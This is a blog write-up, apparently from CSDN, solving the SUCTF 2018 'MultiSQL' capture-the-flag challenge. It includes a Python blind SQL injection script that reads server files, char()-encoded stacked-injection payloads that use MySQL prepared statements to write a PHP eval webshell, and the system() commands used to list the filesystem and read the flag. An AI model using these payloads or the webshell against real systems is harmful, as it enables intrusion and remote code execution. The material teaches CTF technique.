[SUCTF 2018]MultiSQL

最新推荐文章于 2023-12-13 16:23:27 发布
最新推荐文章于 2023-12-13 16:23:27 发布
阅读量1.4k 收藏 6
点赞数 3
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45691294/article/details/109001695
版权

打开题目,是一个页面,只有登录 注册功能可以正常使用
在这里插入图片描述
先注册一个账号,注册后自动登录,登录之后看到
在这里插入图片描述
在用户信息处可以查看到自己的信息
在这里插入图片描述
编辑头像处可以上传头像图片,可能存在文件上传漏洞
前端对文件后缀名进行了过滤,但是上传php文件,存入的依旧是图片文件
在这里插入图片描述
那再看看刚才的查看信息的页面,发现url如下
http://e0063ae7-b2ce-42cd-bf4b-9341c0e87bf9.node3.buuoj.cn/user/user.php?id=2
将id的参数改为1
在这里插入图片描述
存在越权,也可能存在SQL注入,经过测试,存在bool注入,二次注入,也可以用异或注入,但是过滤掉很多关键的函数,其实flag也并不存在于数据库中,只有想办法Get shell才可以得到flag
不过依然可以查询到用户为root,尝试能否读取到文件
参考如下脚本

import requests
cookies = {
    "PHPSESSID":"dgd5o20rmto5h5oqh4hsvp4uu0"
}
data='0x'
flag=''
r=requests.session()
for i in range(9999):
    for i in range(1,127):
        #print (i)
        url='http://e0063ae7-b2ce-42cd-bf4b-9341c0e87bf9.node3.buuoj.cn/user/user.php?id=0^(hex(load_file(0x2f7661722f7777772f68746d6c2f696e6465782e706870))<'+data+str(hex(i)).replace('0x','')+')'
        result=r.get(url=url,cookies=cookies).text
        if 'admin' in result:
            data+=str(hex(i-1)).replace('0x','')
            flag+=(chr(i-1))
            print (flag)
            break
print(data)

在/var/www/html/user/user.php中发现是用mysqli_multi_query()函数进行sql语句查询的,可以多语句执行
/var/www/html//bwvs_config/waf.php添加了魔术引号函数
为了绕过单双引号,使用mysql的预处理语句:

    set @sql = concat('create table ',newT,' like ',old);
    prepare s1 from @sql;
    execute s1;

MySQL预处理参考文章
fuzz测试后发现过滤了union,select ,&,|,过滤了select然后存在堆叠注入的可以使用预处理注入,尝试写入shell,因为过滤了select等字符,使用char()绕过,需要执行的语句
select ‘<?php eval($_POST[_]);?>’ into outfile ‘/var/www/html/favicon/shell.php’;
使用脚本编程十进制:

str="select '<?php eval($_POST[_]);?>' into outfile '/var/www/html/favicon/shell.php';"
len_str=len(str)
for i in range(0,len_str):
	if i == 0:
		print('char(%s'%ord(str[i]),end="")
	else:
		print(',%s'%ord(str[i]),end="")
print(')')

运行结果
char(115,101,108,101,99,116,32,39,60,63,112,104,112,32,101,118,97,108,40,36,95,80,79,83,84,91,95,93,41,59,63,62,39,32,105,110,116,111,32,111,117,116,102,105,108,101,32,39,47,118,97,114,47,119,119,119,47,104,116,109,108,47,102,97,118,105,99,111,110,47,115,104,101,108,108,46,112,104,112,39,59)

payload

?id=2;set @sql=char(115,101,108,101,99,116,32,39,60,63,112,104,112,32,101,118,97,108,40,36,95,80,79,83,84,91,95,93,41,59,63,62,39,32,105,110,116,111,32,111,117,116,102,105,108,101,32,39,47,118,97,114,47,119,119,119,47,104,116,109,108,47,102,97,118,105,99,111,110,47,115,104,101,108,108,46,112,104,112,39,59);prepare query from @sql;execute query;

_=system('cd /;ls');
在这里插入图片描述
flag应该在WelL_Th1s_14_fl4g
查看flag
_=system('cd /;cat WelL_Th1s_14_fl4g ');

在这里插入图片描述

沫忆末忆
关注
  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
[SUCTF 2018]MultiSQL-MySQL预处理
qq_61142406的博客
05-26 269
MySQL传统处理: 客户端准备sql语句 发送sql语句到MySQL服务器 MySQL服务器执行sql语句 服务器执行结果返回客户端 预处理基本策略: 将sql语句强制一分为二: 第一部分为前面相同命令和结构部分 第二部分为后面可变数据部分 首先将前面的sql语句发送给MySQL服务器,让其先执行溢出预处理(并没有真正的执行)第一次发送sql语句的时候将其中可变的数据部分都用一个数据占位符来表示,比如问号? 不带参数的预处理 准备预处理语句 prepare 语句名称 from “预处理的sql
[SUCTF 2019]EasySQL
夜幕下的灯火阑珊的博客
05-11 630
知识点 堆叠注入 sql_mode 打开题目,如图 堆叠注入 查库 1;show databases; 查表 1;show tables; 查Flag 1;show columns from Flag; wp给的payload payload:1;set sql_mode=PIPES_AS_CONCAT;SELECT 1 修改sql_mode,将其设置为PIPES_AS_CONCAT,作用是将"||"作为字符串连接符而非或运算符,修改后实际语句为 SELECT 1;set sql_mod
[SUCTF 2018]MultiSQL(预处理)
qq_62046696的博客
12-31 1016
通过命令获得flag ,可能是我做题少吧,第一次 看见sql中采用预处理然后写入webshell,最后得flag,反过来分析,通过上传文件给了一个可读写权限得路径,一步步收集信息,只能说自己太菜了。wp是通过盲注,然后一个个读取user.php的源码,我简单的跑了一下半个小时也跑不出来,所以我觉得这种方法并不太实用。异或可以然后试试,发现呃呃呃应该是过滤了,fuzz发现就剩了几个符号包括分号,想到了堆叠注入分号链接。为什么有写入权限呢,因为文件上传都是传到了这个目录的里面,所以有可写的权限。
[SUCTF 2018]MultiSQL(mysql预编译)
paidx0
07-12 375
[SUCTF 2018]MultiSQL(mysql预编译)
BUUCTF:[SUCTF 2018]MultiSQL
末初的CSDN博客
04-01 2358
BUUCTF:[SUCTF 2018]MultiSQL 两个地方存在漏洞,注册存在二次注入,在登录的时候触发。用户信息?id存在盲注,flag不在数据库当中,需要利用注入getshell 二次注入我没有成功getshell,先看?id,注册一个用户,登入查看信息 ?id=2^(if(ascii(mid(user(),1,1))>0,0,1))判断存在注入 ...
BUUCTF:[SUCTF 2018]MultiSQL --- 堆叠注入 -- 预处理-- 编码,10进制,16进制。
Zero_Adam的博客
04-17 675
目录:一、自己做:二、 学到的&&不足:三、学习WP:堆叠注入, 参考:初末 一、自己做: 这里试addslash来的 用户信息中,把反斜线去掉展示的 在注册的用户名进行测试, 将 or , by 空格| 替换成为@。 union select or 都过滤了 ,然后在尝试 异或^ substr也被过滤了,然后尝试mid试可以的, 但是这个不好使啊2^(if(ascii(mid(user(),1,1))>0,0,1))。注册页面不好使,然后就看WP了 二、 学到的&&am
BUUCTF-MISC-[SUCTF2018]dead_z3r0
zippo1234的博客
10-23 871
BUUCTF-MISC-[SUCTF2018]dead_z3r0[SUCTF2018]dead_z3r0题目分析开始1.题目2.分析3.分离pyc4.反编译pyc5.逆向解密6.pyc隐写7.get flag结语 每天一题,只能多不能少 [SUCTF2018]dead_z3r0 题目分析 1.pyc文件修复 2.pyc逆向 3.pyc隐写 开始 1.题目 解压后是个无后缀的文件,使用010editor打开 binwalk等未果 2.分析 010editor简单看一看,看到一些可疑内容 怀疑是pyc文件
2018 SUCTF招新赛
qq_42192672的博客
11-15 1760
PWN 1.stack checksec一波 什么保护都没开,可还行,IDA找一波漏洞 read函数百分之百溢出 我们看到了我们喜爱的 改一下rip美滋滋 exp #coding=utf8 from pwn import * context.log_level = 'debug' context.terminal = ['gnome-terminal','-x','b...
CTF训练计划—[SUCTF 2018]GetShell
Lemon's blog
08-19 4411
前言: 这道题考察的是构造无字母数字的webshell,也挺有趣,被卡了一天了,还有看了网上的WP,千篇一律,所以很有必要记录一下。 [SUCTF 2018]GetShell 直接给出源码 <?php if($contents=file_get_contents($_FILES["file"]["tmp_name"])){ $data=substr($contents,5); foreach ($black_char as $b) { if (stripos($data
buu-[SUCTF 2018]MultiSQL
qaq517384的博客
10-23 269
打开环境,只有登录和注册界面,admin已存在,随便注册一个算了 登录后有两个选项 头像界面就是一个文件上传,象征性的传一张,得到一个文件夹,可以正常访问 用户信息界面还有url的user/user.php?id=2 很明显的sql注入(如果考点是注入的话) 看一眼题目,然后默默的吧id改成1,能看到admin但是没有用 测了一下字符型和整形注入都没回显 脚本不知道为什么没有返回值,浏览器是能成功访问的 ?id=1^(ascii(mid(user(),1,1))>0) 就手注了一下user()是
[SUCTF 2018]MultiSQL-MySQL预处理学习
cjdgg的博客
05-11 409
[SUCTF 2018]MultiSQL-MySQL预处理学习 进入题目后,注册账户登录 编辑头像可以上传文件,但是上传了php文件还是会变成jpg格式 再看用户信息这里,id=2那里可以随意更改,存在越权,1就是admin 这里接下来要用到MySQL的预处理,参考文章 set MariaDB [(none)]> set @a='select version()'; Query OK, 0 rows affected (0.00 sec) MariaDB [(none)]> select
BUUCTF--[SUCTF 2018]MultiSQL
qq_46263951的博客
07-28 398
进入之后是这样的页面,我们先来注册一个帐号 查看用户信息 在?id=后存在一个sql盲注,我们来尝试一下?id=2^(if(ascii(mid(user(),1,1))>0,0,1))判断存在注入,2异或0还是为2 经过fuzz测试后发现这里过滤了union,select ,&,|,过滤了select然后存在堆叠注入的可以使用预处理注入,尝试写入shell,因为过滤了select等字符,使用char()绕过,需要执行的语句select '<?php eval($_POST[.
[SUCTF 2018]MultiSQL MYSQL 预处理写
最新发布
m0_64180167的博客
12-13 807
然后我们开始fuzz 发现 select ,union 都没了。首先这道题需要预处理写马 之前在ctfshow中学习过预处理。发现可以闭合 所以这里是存在堆叠注入的。这里就实现了绕过 并且执行了命令。首先我们开始判断是否存在注入。所以我们看看能不能写木马。
buuctf-web-[SUCTF 2018]MultiSQL1
mlws1900的博客
03-07 502
可以读/var/www/html/index.php文件,读取/var/www/html/user/user.php文件(这种方法跑十几分钟也跑不出来)mysqli_multi_query() 执行的sql语句,其可以执行一个或多个针对数据库的查询,多个查询用分号进行分隔,也就存在堆叠注入。存在各种限制,select,union,直接用char绕过(太菜,用其他绕过写马失败)注册一个账号,注册admin提示用户存在,可能有二次注入,注册admin'上传点目前没啥用,从注入点进行操作,尝试读文件。
multi mysql_mysqld_multi 配置MySQL多实例
weixin_29376541的博客
02-01 146
本文讲利用MySQL源码安装MySQL并用mysqld_multi配置多实例。1、下载MySQL源码安装版本到MySQL官网查找到相应版本下载,本文下载的是5.1版本wget -c ftp://ftp.mirrorservice.org/sites/ftp.mysql.com/Downloads/MySQL-5.1/mysql-5.1.60.tar.gz2、解压安装tar -zxv -f mysq...
[suctf 2019]EasySQL
09-12
[suctf 2019]EasySQL是一个SQL题目,与引用和引用中提到的设置sql_mode有关。具体来说,题目中使用了设置sql_mode=PIPES_AS_CONCAT的语句,这个设置的作用是将"||"操作符解释为字符串的连接操作符而不是或运算符。这与Oracle数据库的行为相似,也类似于字符串的拼接函数Concat。因此,在这个题目中,可以使用"||"操作符来进行字符串的连接操作。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值